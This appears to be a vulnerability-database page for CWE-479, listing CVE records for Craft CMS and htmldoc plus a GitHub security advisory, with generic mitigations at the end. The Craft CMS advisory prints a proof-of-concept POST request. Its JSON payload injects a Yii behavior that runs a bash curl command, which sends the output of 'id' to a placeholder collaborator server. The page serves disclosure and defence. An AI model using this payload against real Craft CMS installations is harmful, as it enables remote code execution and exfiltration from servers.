Common Weakness Enumeration

CWE-479

Allowed

Signal Handler Use of a Non-reentrant Function

Abstraction: Variant · Status: Draft

The product defines a signal handler that calls a non-reentrant function.

3 vulnerabilities reference this CWE, most recent first.

CVE-2026-44011 (GCVE-0-2026-44011)

Vulnerability from cvelistv5 – Published: 2026-05-12 20:25 – Updated: 2026-05-13 15:37
VLAI
Title
Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior
Summary
Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18.
SSVC
Exploitation: poc Automatable: no Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
  • CWE-479 - Signal Handler Use of a Non-reentrant Function
Assigner
References
Impacted products
Vendor Product Version
craftcms cms Affected: >= 4.0.0, < 4.17.12
Affected: >= 5.0.0, < 5.9.18
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44011",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T15:01:05.700590Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T15:37:25.178Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cms",
          "vendor": "craftcms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.0.0, \u003c 4.17.12"
            },
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.9.18"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "privilegesRequired": "HIGH",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-479",
              "description": "CWE-479: Signal Handler Use of a Non-reentrant Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-12T20:25:08.183Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
        },
        {
          "name": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
        }
      ],
      "source": {
        "advisory": "GHSA-qrgm-p9w5-rrfw",
        "discovery": "UNKNOWN"
      },
      "title": "Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44011",
    "datePublished": "2026-05-12T20:25:08.183Z",
    "dateReserved": "2026-05-04T21:24:36.505Z",
    "dateUpdated": "2026-05-13T15:37:25.178Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2021-26948 (GCVE-0-2021-26948)

Vulnerability from cvelistv5 – Published: 2022-03-03 00:00 – Updated: 2024-08-03 20:33
VLAI
Summary
Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.
Severity
No CVSS data available.
CWE
Assigner
References
Impacted products
Vendor Product Version
n/a htmldoc Affected: v1.9.11
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.561Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/michaelrsweet/htmldoc/issues/410"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "htmldoc",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "v1.9.11"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-479",
              "description": "CWE-479-\u003eCWE-476",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-07T00:00:00.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "url": "https://github.com/michaelrsweet/htmldoc/issues/410"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2021-26948",
    "datePublished": "2022-03-03T00:00:00.000Z",
    "dateReserved": "2021-04-06T00:00:00.000Z",
    "dateUpdated": "2024-08-03T20:33:41.561Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-QRGM-P9W5-RRFW

Vulnerability from github – Published: 2026-05-06 17:54 – Updated: 2026-05-13 16:29
VLAI
Summary
Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
Details

We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:

``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json

{

"elementType": "craft\elements\Category", "siteId": 1, "search": "", "condition": { "class": "craft\elements\conditions\ElementCondition", "elementType": "craft\elements\Category", "fieldLayouts": [ { "as rce": { "__class": "yii\behaviors\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": [ "Psy\Readline\Hoa\ConsoleProcessus", "execute" ] }, "typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/id](https://yourcollaboratorservergoeshere/%60id%60/)"" } ] }, "on *": "self::beforeSave" } ] } } ```

Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.17.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.9.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44011"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470",
      "CWE-479"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T17:54:06Z",
    "nvd_published_at": "2026-05-12T21:16:15Z",
    "severity": "HIGH"
  },
  "details": "We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  Yii\u2019s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command \u201cid\u201d for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: \u2026\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
  "id": "GHSA-qrgm-p9w5-rrfw",
  "modified": "2026-05-13T16:29:16Z",
  "published": "2026-05-06T17:54:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior"
}

Mitigation
Requirements

Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness.

Mitigation
Architecture and Design

Design signal handlers to only set flags rather than perform complex functionality.

Mitigation
Implementation

Ensure that non-reentrant functions are not found in signal handlers.

Mitigation
Implementation

Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally.

No CAPEC attack patterns related to this CWE.